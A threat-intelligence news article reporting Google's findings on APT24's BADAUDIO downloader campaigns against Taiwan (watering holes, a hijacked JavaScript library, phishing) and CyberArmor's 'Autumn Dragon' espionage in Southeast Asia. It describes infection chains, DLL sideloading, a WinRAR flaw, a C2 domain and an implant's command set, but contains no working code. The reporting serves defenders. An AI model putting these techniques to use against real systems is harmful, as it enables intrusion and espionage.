A China-linked threat actor known as APT24 has been observed using previously undocumented malware known as BADAUDIO to establish persistent remote access to compromised networks as part of a nearly three-year campaign.
“While previous operations relied on a wide range of strategic web breaches to compromise legitimate websites, APT24 recently pivoted to using more sophisticated vectors to target organizations in Taiwan,” said Google Threat Intelligence Group (GTIG) researchers Harsh Parashar, Tierra Duncan, and Dan Perez.
“This includes repeated compromises of regional digital marketing companies and the use of targeted phishing campaigns to carry out supply chain attacks.”
APT24, also known as Pitty Tiger, is the nickname given to a group believed to be a Chinese hacker group targeting the government, healthcare, construction/engineering, mining, nonprofit, and communications sectors in the United States and Taiwan.
According to a July 2014 report from FireEye, the attackers are believed to have been active as early as 2008, and their attacks use email pushes to trick recipients into opening Microsoft Office documents and exploit known security flaws in the software (such as CVE-2012-0158 and CVE-2014-1761) to infect systems with malware.
Malware families associated with APT24 include CT RAT, a variant of Enfal/Lurid Downloader known as MM RAT (also known as Goldsun-B), and variants of Gh0st RAT known as Paladin RAT and Leo RAT. Another notable piece of malware used by threat actors is a backdoor named Taidoor (also known as Roudan).
APT24 is assessed to be closely related to another Advanced Persistent Threat (APT) group called Earth Aughisky. The group also deployed Taidoor in its campaigns, leveraging infrastructure previously attributed to APT24 as part of an campaign to distribute another backdoor called Specas.
According to Trend Micro’s October 2022 report, both malware strains are designed to read proxy settings from a specific file: %systemroot%\\system32\\sprxx.dll.
According to GTIG’s latest findings, the BADAUDIO campaign has been ongoing since November 2022, with attackers using watering holes, supply chain compromises, and spear phishing as initial access vectors.
BADAUDIO, a highly obfuscated malware written in C++, uses control flow flattening to resist reverse engineering and acts as a first-stage downloader that can download, decrypt, and execute AES-encrypted payloads from a hardcoded command-and-control (C2) server. It works by gathering basic system information and extracting it to a server, which responds with a payload that is executed on the host. In one case, it was a cobalt strike beacon.
BADAUDIO campaign overview
“BADAUDIO typically manifests itself as a malicious dynamic link library (DLL) that leverages DLL search order hijacking (MITRE ATT&CK T1574.001) to execute through legitimate applications,” GTIG said. “The recently observed variant exhibits a sophisticated execution chain. The encrypted archive contains the BADAUDIO DLL along with VBS, BAT, and LNK files.”
From November 2022 to at least early September 2025, APT24 is estimated to have compromised more than 20 legitimate websites, injected malicious JavaScript code that specifically excluded visitors from macOS, iOS, and Android, used the FingerprintJS library to generate a unique browser fingerprint, and displayed fake pop-ups disguised as Google Chrome updates inviting users to download BADAUDIO.
Then, starting in July 2024, the hacking group infiltrated a regional digital marketing company in Taiwan and orchestrated a supply chain attack by injecting malicious JavaScript into a widely used JavaScript library distributed by the company, effectively allowing it to hijack more than 1,000 domains.
The modified third-party script is configured to impersonate a legitimate Content Delivery Network (CDN) to access the typosquatted domain, obtain attacker-controlled JavaScript to fingerprint the machine, and, upon verification, display a pop-up to download BADAUDIO.
“The June 2025 breach originally used conditional script loading based on a unique web ID (specific domain name) associated with the website using the compromised third-party script,” Google said. “This suggests customized targeting to limit strategic web compromise (MITRE ATT&CK T1189) to a single domain.”
Compromised JS supply chain attack to distribute BADAUDIO malware
“However, for 10 days in August, this condition was temporarily lifted, allowing all 1,000 domains using the script to be compromised before the original restrictions were reimposed.”
APT24 has also been observed conducting targeted phishing attacks since August 2024, using decoys associated with animal protection organizations to trick recipients into responding, ultimately delivering BADAUDIO via encrypted archives hosted on Google Drive and Microsoft OneDrive. These messages have a tracking pixel embedded in them to see if the target has opened the email and adjust the attack accordingly.
“The use of advanced techniques, including supply chain compromises, multi-layered social engineering, and exploitation of legitimate cloud services, demonstrate the attackers’ persistent and adaptive espionage capabilities,” Google said in a statement.
APT Group in collaboration with China targets Southeast Asia
The disclosure comes as CyberArmor details sustained espionage operations orchestrated by threat actors believed to have ties to China against the governments, media, and news sectors of Laos, Cambodia, Singapore, the Philippines, and Indonesia. This activity has been codenamed “Autumn Dragon.”
The attack chain begins with a RAR archive that appears to be sent as an attachment in a spear-phishing message, and once extracted, launches a batch script (‘Windows Defender Definition Update.cmd’) that exploits a security flaw in WinRAR (CVE-2025-8088, CVSS score: 8.8). This script sets persistence so that the malware is automatically launched the next time the user logs into the system.
It also downloads a second RAR archive hosted in Dropbox via PowerShell. The RAR archive contains two files: a legitimate executable (‘obs-browser-page.exe’) and a malicious DLL (‘libcef.dll’). The batch script then executes the binary to sideload the DLL, communicates with the attacker via Telegram to obtain commands (“Shell”), captures a screenshot (“Screenshot”), and drops an additional payload (“Upload”).
“Bot controllers (threat actors) use these three commands to gather information, spy on the victim’s computer, and deploy third-stage malware,” security researchers Nguyen Nguyen and BartBlaze said. “This design allows the controller to remain stealthy and avoid detection.”
The third stage again uses DLL sideloading to launch the malicious DLL (‘CRClient.dll’) using the real binary (‘Creative Cloud Helper.exe’). It then decrypts and executes the shellcode responsible for loading and executing the final payload. This is a lightweight implant written in C++ that can communicate with a remote server (‘public.megadatacloud’).[.]com”) and supports eight different commands.
65, Use “cmd.exe” to run the specified command, collect the results, and extract it back to the C2 server 66, Load and execute the DLL 67, Execute the shellcode 68, Update the configuration 70, Read the file provided by the operator 71, Open the file and write the content provided by the operator 72, Get/Set the current directory 73, sleeps at random intervals and terminates itself
This activity has not been linked to any specific actor or group, but may be the work of a Chinese-aligned group with intermediate operational capabilities. This assessment is based on adversaries’ continued targeting of countries in the South China Sea.
“The attack campaign was highly targeted,” the researchers said. “Through our analysis, we frequently observed that the following stages were hosted behind Cloudflare with geo-restrictions enabled, as well as other restrictions such as only allowing certain HTTP user agents.”
Source link
